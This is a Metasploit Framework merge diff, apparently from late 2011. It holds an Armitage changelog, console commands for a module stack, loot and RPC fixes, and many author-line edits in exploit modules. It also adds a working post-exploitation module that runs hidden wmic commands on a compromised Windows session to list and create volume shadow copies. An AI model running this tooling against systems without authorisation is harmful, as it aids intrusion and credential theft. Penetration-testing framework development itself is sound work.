Merge remote branch 'upstream/master'
commit
b9b5b1e66f
Binary file not shown.
|
@ -1,6 +1,41 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
30 Dec 11 - last release of the year?
|
||||
---------
|
||||
- Hosts -> Clear Database now clears the sessions and clients tables
|
||||
- Fixed a bug preventing dynamic workspace port/session filter from
|
||||
working on a fresh database. This was a fun one. This only affected
|
||||
folks with a completely fresh database and because Hosts -> Clear
|
||||
Database didn't clear everything, this went unnoticed until now.
|
||||
- Added various reverse shell payloads to payload helper dialog.
|
||||
- Added file chooser helper for SigningCert and SigningKey options.
|
||||
- Added hack to return correct route info when setting up pivoting through
|
||||
Java meterpreter.
|
||||
- Armitage now posts a note to the event log when a user starts a browser
|
||||
exploit or a server module.
|
||||
- Armitage now supports dragging and dropping a module onto a host in graph
|
||||
and table view. This action opens the module launcher configured to work
|
||||
with that host.
|
||||
- Drastically rewrote MSF Scans. MSF Scans now intelligently builds a list
|
||||
of ports to scan based on what Metasploit can do. After an initial port
|
||||
scan, MSF Scans runs discovery modules against relevant hosts. As a bonus
|
||||
you will see all of the output of these scans.
|
||||
- Enhanced the Windows heuristic used to guess which OS image to display
|
||||
- The deconfliction server throttle is now less draconian about how long it
|
||||
throttles a call.
|
||||
- Armitage no longer posts to the event log from the UI thread (this will
|
||||
prevent the UI from blocking in some cases)
|
||||
- Command shell now handles interaction with d-server in a separate thread
|
||||
from the UI thread. This will prevent UI blocking in some cases.
|
||||
- Added Ping Sweep... option for non-Windows meterpreter sessions. Now Java
|
||||
meterpreter users have a quick host discovery option.
|
||||
- Change Host OS option now matches new Metasploit database schema.
|
||||
- Deconfliction server now sets LHOST to the IP address you provided. Also,
|
||||
Armitage clients do not overwrite LHOST once it is set.
|
||||
- Interacting with a shell in team mode no longer blocks UI to communicate
|
||||
with d-server.
|
||||
|
||||
12 Dec 11
|
||||
---------
|
||||
- Armitage teaming mode now downloads the resulting file for any fileformat
|
||||
|
|
|
@ -19,7 +19,6 @@ module Auxiliary::Report
|
|||
end
|
||||
|
||||
def myworkspace
|
||||
return @myworkspace if @myworkspace
|
||||
@myworkspace = framework.db.find_workspace(self.workspace)
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,201 @@
|
|||
require 'msf/core/post/windows/services'
|
||||
|
||||
|
||||
module Msf
|
||||
class Post
|
||||
module Windows
|
||||
|
||||
module ShadowCopy
|
||||
include Msf::Post::Windows::WindowsServices
|
||||
|
||||
|
||||
def get_vss_device(id)
|
||||
result = get_sc_param(id,'DeviceObject')
|
||||
end
|
||||
|
||||
def vss_list
|
||||
ids = vss_get_ids
|
||||
shadow_copies = []
|
||||
ids.each do |id|
|
||||
print_status "Getting data for Shadow Copy #{id} (This may take a minute)"
|
||||
shadow_copies << get_sc_details("\"#{id}\"")
|
||||
end
|
||||
return shadow_copies
|
||||
end
|
||||
|
||||
def vss_get_ids
|
||||
result = wmicexec('shadowcopy get id')
|
||||
ids = result.scan(/\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}/)
|
||||
return ids
|
||||
end
|
||||
|
||||
def vss_get_storage
|
||||
storage={}
|
||||
storage['AllocatedSpace'] = vss_get_storage_param('AllocatedSpace')
|
||||
storage['MaxSpace'] = vss_get_storage_param('MaxSpace')
|
||||
storage['UsedSpace'] = vss_get_storage_param('UsedSpace')
|
||||
return storage
|
||||
end
|
||||
|
||||
def get_sc_details(id)
|
||||
shadowcopy={}
|
||||
shadowcopy['ID'] = id
|
||||
shadowcopy['ClientAccessible'] = get_sc_param(id,'ClientAccessible')
|
||||
shadowcopy['Count'] = get_sc_param(id,'Count')
|
||||
shadowcopy['DeviceObject'] = get_sc_param(id,'DeviceObject')
|
||||
shadowcopy['Differential'] = get_sc_param(id,'Differential')
|
||||
shadowcopy['ExposedLocally'] = get_sc_param(id,'ExposedLocally')
|
||||
shadowcopy['ExposedName'] = get_sc_param(id,'ExposedName')
|
||||
shadowcopy['ExposedRemotely'] = get_sc_param(id,'ExposedRemotely')
|
||||
shadowcopy['HardwareAssisted'] = get_sc_param(id,'HardwareAssisted')
|
||||
shadowcopy['Imported'] = get_sc_param(id,'Imported')
|
||||
shadowcopy['NoAutoRelease'] = get_sc_param(id,'NoAutoRelease')
|
||||
shadowcopy['NotSurfaced'] = get_sc_param(id,'Notsurfaced')
|
||||
shadowcopy['NoWriters'] = get_sc_param(id,'NoWriters')
|
||||
shadowcopy['OriginiatingMachine'] = get_sc_param(id,'OriginatingMachine')
|
||||
shadowcopy['Persistent'] = get_sc_param(id,'Persistent')
|
||||
shadowcopy['Plex'] = get_sc_param(id,'Plex')
|
||||
shadowcopy['ProviderID'] = get_sc_param(id,'ProviderID')
|
||||
shadowcopy['ServiceMachine'] = get_sc_param(id,'ServiceMachine')
|
||||
shadowcopy['SetID'] = get_sc_param(id,'SetID')
|
||||
shadowcopy['State'] = get_sc_param(id,'State')
|
||||
shadowcopy['Transportable'] = get_sc_param(id,'Transportable')
|
||||
shadowcopy['VolumeName'] = get_sc_param(id,'VolumeName')
|
||||
return shadowcopy
|
||||
end
|
||||
|
||||
def get_sc_param(id,param_name)
|
||||
result = wmicexec("shadowcopy where(id=#{id}) get #{param_name}")
|
||||
result.gsub!(param_name,'')
|
||||
result.gsub!(/\s/,'')
|
||||
end
|
||||
|
||||
def vss_get_storage_param(param_name)
|
||||
result = wmicexec("shadowstorage get #{param_name}")
|
||||
result.gsub!(param_name,'')
|
||||
result.gsub!(/\s/,'')
|
||||
end
|
||||
|
||||
def vss_set_storage(bytes)
|
||||
result = wmicexec("shadowstorage set MaxSpace=\"#{bytes}\"")
|
||||
if result.include?("success")
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def create_shadowcopy(volume)
|
||||
result = wmicexec("shadowcopy call create \"ClientAccessible\", \"#{volume}\"")
|
||||
retval = result.match(/ReturnValue = (\d)/)
|
||||
case retval[1].to_i
|
||||
when 0
|
||||
print_status("ShadowCopy created successfully")
|
||||
sc_id = result.match(/ShadowID = ("\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}")/)
|
||||
return sc_id[1]
|
||||
when 1
|
||||
print_error("Access Denied")
|
||||
when 2
|
||||
print_error("Invalid Argument")
|
||||
when 3
|
||||
print_error("Specified volume not found")
|
||||
when 4
|
||||
print_error("Specified volume not supported")
|
||||
when 5
|
||||
print_error("Unsupported shadow copy context")
|
||||
when 6
|
||||
print_error("Insufficient Storage")
|
||||
when 7
|
||||
print_error("Volume is in use")
|
||||
when 8
|
||||
print_error("Maximum number of shadow copies reached")
|
||||
when 9
|
||||
print_error("Another shadow copy operation is already in progress")
|
||||
when 10
|
||||
print_error("Shadow copy provider vetoed the operation")
|
||||
when 11
|
||||
print_error("Shadow copy provider not registered")
|
||||
when 12
|
||||
print_error("Shadow copy provider failure")
|
||||
else
|
||||
print_error("Unknown error")
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
def start_vss
|
||||
vss_state = wmicexec('Service where(name="VSS") get state')
|
||||
if vss_state=~ /Running/
|
||||
print_status("Volume Shadow Copy service is running.")
|
||||
else
|
||||
print_status("Volume Shadow Copy service not running. Starting it now...")
|
||||
begin
|
||||
ss_result = service_start("VSS")
|
||||
case ss_result
|
||||
when 0
|
||||
print_status("Volume Shadow Copy started successfully.")
|
||||
when 1
|
||||
print_error("Volume Shadow Copy already running.")
|
||||
when 2
|
||||
print_error("Volume Shadow Copy is disabled.")
|
||||
print_status("Attempting to re-enable...")
|
||||
service_change_startup("VSS","manual")
|
||||
ss_result = service_start("VSS")
|
||||
if ss_result == 0
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
rescue
|
||||
print_error("Insufficient Privs to start service!")
|
||||
return false
|
||||
end
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
def wmicexec(wmiccmd)
|
||||
tmpout = ''
|
||||
session.response_timeout=120
|
||||
begin
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
|
||||
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
#Making sure that wmic finishes before executing next wmic command
|
||||
prog2check = "wmic.exe"
|
||||
found = 0
|
||||
while found == 0
|
||||
session.sys.process.get_processes().each do |x|
|
||||
found =1
|
||||
if prog2check == (x['name'].downcase)
|
||||
sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
r.close
|
||||
|
||||
# Read the output file of the wmic commands
|
||||
wmioutfile = session.fs.file.new(wmicfl, "rb")
|
||||
until wmioutfile.eof?
|
||||
tmpout << wmioutfile.read
|
||||
end
|
||||
wmioutfile.close
|
||||
rescue ::Exception => e
|
||||
print_error("Error running WMIC commands: #{e.class} #{e}")
|
||||
end
|
||||
# We delete the file with the wmic command output.
|
||||
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
|
||||
c.close
|
||||
tmpout.gsub!(/[^[:print:]]/,'') #scrub out garbage
|
||||
return tmpout
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -71,7 +71,7 @@ class Client
|
|||
resp = MessagePack.unpack(res.body)
|
||||
|
||||
if resp and resp.kind_of?(::Hash) and resp['error'] == true
|
||||
raise Msf::RPC::ServerException.new(res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
|
||||
raise Msf::RPC::ServerException.new(resp['error_code'] || res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
|
||||
end
|
||||
|
||||
return resp
|
||||
|
|
|
@ -88,6 +88,9 @@ class Core
|
|||
"kill" => "Kill a job",
|
||||
"load" => "Load a framework plugin",
|
||||
"loadpath" => "Searches for and loads modules from a path",
|
||||
"popm" => "Pops the latest module off of the module stack and makes it active",
|
||||
"pushm" => "Pushes the active or list of modules onto the module stack",
|
||||
"previous" => "Sets the previously loaded module as the current module",
|
||||
"quit" => "Exit the console",
|
||||
"resource" => "Run the commands stored in a file",
|
||||
"makerc" => "Save commands entered since start to a file",
|
||||
|
@ -118,6 +121,8 @@ class Core
|
|||
|
||||
@dscache = {}
|
||||
@cache_payloads = nil
|
||||
@previous_module = nil
|
||||
@module_name_stack = []
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -2127,8 +2132,9 @@ class Core
|
|||
return false
|
||||
end
|
||||
|
||||
# If there's currently an active module, go back
|
||||
# If there's currently an active module, enqueque it and go back
|
||||
if (active_module)
|
||||
@previous_module = active_module
|
||||
cmd_back()
|
||||
end
|
||||
|
||||
|
@ -2153,6 +2159,94 @@ class Core
|
|||
driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true)
|
||||
end
|
||||
|
||||
#
|
||||
# Command to take to the previously active module
|
||||
#
|
||||
def cmd_previous()
|
||||
if @previous_module
|
||||
self.cmd_use(@previous_module.fullname)
|
||||
else
|
||||
print_error("There isn't a previous module at the moment")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Help for the 'previous' command
|
||||
#
|
||||
def cmd_previous_help
|
||||
print_line "Usage: previous"
|
||||
print_line
|
||||
print_line "Set the previously loaded module as the current module"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Command to enqueque a module on the module stack
|
||||
#
|
||||
def cmd_pushm(*args)
|
||||
# could check if each argument is a valid module, but for now let them hang themselves
|
||||
if args.count > 0
|
||||
args.each do |arg|
|
||||
@module_name_stack.push(arg)
|
||||
# Note new modules are appended to the array and are only module (full)names
|
||||
end
|
||||
else #then just push the active module
|
||||
if active_module
|
||||
#print_status "Pushing the active module"
|
||||
@module_name_stack.push(active_module.fullname)
|
||||
else
|
||||
print_error("There isn't an active module and you didn't specify a module to push")
|
||||
return self.cmd_pushm_help
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Help for the 'pushm' command
|
||||
#
|
||||
def cmd_pushm_help
|
||||
print_line "Usage: pushm [module1 [,module2, module3...]]"
|
||||
print_line
|
||||
print_line "push current active module or specified modules onto the module stack"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Command to dequeque a module from the module stack
|
||||
#
|
||||
def cmd_popm(*args)
|
||||
if (args.count > 1 or not args[0].respond_to?("to_i"))
|
||||
return self.cmd_popm_help
|
||||
elsif args.count == 1
|
||||
# then pop 'n' items off the stack, but don't change the active module
|
||||
if args[0].to_i >= @module_name_stack.count
|
||||
# in case they pass in a number >= the length of @module_name_stack
|
||||
@module_name_stack = []
|
||||
print_status("The module stack is empty")
|
||||
else
|
||||
@module_name_stack.pop[args[0]]
|
||||
end
|
||||
else #then just pop the array and make that the active module
|
||||
pop = @module_name_stack.pop
|
||||
if pop
|
||||
return self.cmd_use(pop)
|
||||
else
|
||||
print_error("There isn't anything to pop, the module stack is empty")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Help for the 'popm' command
|
||||
#
|
||||
def cmd_popm_help
|
||||
print_line "Usage: popm [n]"
|
||||
print_line
|
||||
print_line "pop the latest module off of the module stack and make it the active module"
|
||||
print_line "or pop n modules off the stack, but don't change the active module"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Tab completion for the use command
|
||||
#
|
||||
|
|
|
@ -948,6 +948,27 @@ class Db
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Handle hostless loot
|
||||
if host_ranges.compact.empty? # Wasn't a host search
|
||||
hostless_loot = framework.db.loots.find_all_by_host_id(nil)
|
||||
hostless_loot.each do |loot|
|
||||
row = []
|
||||
row.push("")
|
||||
row.push("")
|
||||
row.push(loot.ltype)
|
||||
row.push(loot.name || "")
|
||||
row.push(loot.content_type)
|
||||
row.push(loot.info || "")
|
||||
row.push(loot.path)
|
||||
tbl << row
|
||||
if (mode == :delete)
|
||||
loot.destroy
|
||||
delete_count += 1
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
print_line
|
||||
print_line tbl.to_s
|
||||
print_status "Deleted #{delete_count} loots" if delete_count > 0
|
||||
|
|
|
@ -253,7 +253,7 @@ module Net; module SSH; module Service
|
|||
'MsfExploit' => session.options[:msfmodule]
|
||||
}
|
||||
)
|
||||
options[:msfmodule].add_socket(client) if session.options[:msfmodule]
|
||||
session.options[:msfmodule].add_socket(client) if session.options[:msfmodule]
|
||||
|
||||
info { "connected #{connected_address}:#{connected_port} originator #{originator_address}:#{originator_port}" }
|
||||
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'BID', '31531' ],
|
||||
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
|
||||
],
|
||||
'Author' => [ 'Anshul Pandey <anshul999@gmail.com>', 'patrick' ],
|
||||
'Author' => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'patrick' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
|
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Author' =>
|
||||
[
|
||||
'sid', # Original POC
|
||||
'TheLightCosine <thelightcosine@gmail.com>' # msf module
|
||||
'TheLightCosine <thelightcosine[at]gmail.com>' # msf module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
|
|
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ChangeCipherspec Datagram before a ClientHello.
|
||||
},
|
||||
'Author' => [
|
||||
'Jon Oberheide <jon@oberheide.org>', #original code
|
||||
'TheLightCosine <thelightcosine@gmail.com>' # metasploit module
|
||||
'Jon Oberheide <jon[at]oberheide.org>', #original code
|
||||
'TheLightCosine <thelightcosine[at]gmail.com>' # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
Enterprise Business Suite service.
|
||||
},
|
||||
|
||||
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
|
||||
'Author' => [ 'guiness.stout <guinness.stout[at]gmail.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
without SP1 does not seem affected by this flaw.
|
||||
},
|
||||
|
||||
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
|
||||
'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
info for a given CorpWatch ID of the company. If you don't know the
|
||||
CorpWatch ID, please use the corpwatch_lookup_name module first.
|
||||
},
|
||||
'Author' => [ 'Brandon Perry' ],
|
||||
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://api.corpwatch.org/' ]
|
||||
|
@ -520,7 +520,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CWID']}.txt","#{datastore["CW_ID"]} Specific Information")
|
||||
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
|
||||
|
||||
print_line()
|
||||
print_status("Saved in: #{p}")
|
||||
|
|
|
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
acknolwdge the limitations of the data CorpWatch provides, and should always
|
||||
verify the information with the official SEC filings before taking any action.
|
||||
},
|
||||
'Author' => [ 'Brandon Perry' ],
|
||||
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://api.corpwatch.org/' ]
|
||||
|
|
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'DECT Call Scanner',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'This module scans for active DECT calls',
|
||||
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
|
||||
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.dedected.org'] ]
|
||||
)
|
||||
|
|
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'DECT Base Station Scanner',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'This module scans for DECT base stations',
|
||||
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
|
||||
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.dedected.org'] ]
|
||||
)
|
||||
|
|
|
@ -26,12 +26,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a buffer overflow in the encryption option handler of the
|
||||
FreeBSD telnet service.
|
||||
},
|
||||
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
|
||||
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['BID', '51182'],
|
||||
['CVE', '2011-4862'],
|
||||
['OSVDB', '78020'],
|
||||
['BID', '51182'],
|
||||
['URL', 'http://www.exploit-db.com/exploits/18280/']
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -28,12 +28,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
|
||||
Linux systems running telnetd.
|
||||
},
|
||||
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
|
||||
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['BID', '51182'],
|
||||
['CVE', '2011-4862'],
|
||||
['OSVDB', '78020'],
|
||||
['BID', '51182'],
|
||||
['URL', 'http://www.exploit-db.com/exploits/18280/']
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
@ -49,7 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
|
||||
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => ''))
|
||||
|
|
|
@ -27,9 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' =>
|
||||
[
|
||||
'EgiX <n0b0d13s[at]gmail-com>', # original discovery/poc
|
||||
'mr_me <steventhomasseeley[at]gmail-com>', # msf
|
||||
'TecR0c <roccogiovannicalvi[at]gmail-com >', # msf
|
||||
'EgiX <n0b0d13s[at]gmail.com>', # original discovery/poc
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com >', # msf
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
|
|
|
@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Plone Security team', # Vulnerability discovery
|
||||
'Nick Miles', # Original exploit
|
||||
'TecR0c' # Metasploit module
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2011-3587'],
|
||||
['OSVDB', '76105'],
|
||||
['URL', 'http://www.exploit-db.com/exploits/18262/'],
|
||||
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
|
||||
],
|
||||
|
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'EgiX', # Vulnerability discovery and exploit
|
||||
'TecR0c' # Metasploit Module
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
|
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'EgiX', # Vulnerability discovery and exploit
|
||||
'TecR0c' # Metasploit Module
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
|
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'shinnai', # original discovery
|
||||
'mr_me', # msf
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf
|
||||
'sinn3r' # wbemexec tekniq
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
|
|
|
@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'Dr_IDE', # Vulnerability discovery and original exploit
|
||||
'TecR0c', # Metasploit module
|
||||
'mr_me' # Metasploit module
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
|
||||
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
|
|
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'regenrecht', # discovery
|
||||
'Rh0', # metasploit module
|
||||
'mr_me' # win7 target
|
||||
'mr_me <steventhomasseeley[at]gmail.com>' # win7 target
|
||||
],
|
||||
'Version' => "$Revision$",
|
||||
'References' =>
|
||||
|
|
|
@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Matteo Memelli', #PoC from Exploit-DB
|
||||
'dookie2000ca', #"Helping" ryujin (Matteo)
|
||||
'sinn3r', #Metasploit
|
||||
'mr_me', #XP target (no aslr)
|
||||
'TecR0c', #XP target (no aslr)
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', #XP target (no aslr)
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>', #XP target (no aslr)
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
|
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Trirat Puttaraksa <trir00t [at] gmail.com>',
|
||||
'Trirat Puttaraksa <trir00t[at]gmail.com>',
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
@ -152,6 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if target.name == 'Automatic'
|
||||
mytarget = auto_target(cli, request)
|
||||
if mytarget.nil?
|
||||
agent = request.headers['User-Agent']
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
|
|
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
|
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
property of ienipp.ocx an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
|
|
@ -28,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'Luigi Auriemma', # original find
|
||||
'mr_me <steventhomasseeley[at]gmail-com>', # msf module
|
||||
'TecR0c <roccogiovannicalvi[at]gmail-com >',# msf module
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com >',# msf module
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'shinnai', # Vulnerability discovery and original exploit
|
||||
'TecR0c', # Metasploit module
|
||||
'mr_me' # Metasploit module
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
|
||||
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'hdm',
|
||||
'Faithless <rhyskidd [at] gmail.com>'
|
||||
'Faithless <rhyskidd[at]gmail.com>'
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'Microsoft', # reported to Adobe
|
||||
'villy <villys777 [at] gmail.com>', # public exploit
|
||||
'villy <villys777[at]gmail.com>', # public exploit
|
||||
# Metasploit version by:
|
||||
'jduck'
|
||||
],
|
||||
|
|
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'sup3r', #Initial disclosure, poc (9.5)
|
||||
'sickn3ss', #9.6 poc
|
||||
'sinn3r', #Metasploit
|
||||
'mr_me', #NX bypass target
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', #NX bypass target
|
||||
'silent_dream', #Win 7 target
|
||||
],
|
||||
'References' =>
|
||||
|
|
|
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Jeremy Brown <0xjbrown41 [at] gmail.com>',
|
||||
'Jeremy Brown <0xjbrown41[at]gmail.com>',
|
||||
'loneferret',
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
|
|
|
@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me', # original discovery & msf exploit
|
||||
'TecR0c' # msf exploit
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # original discovery & msf exploit
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>' # msf exploit
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
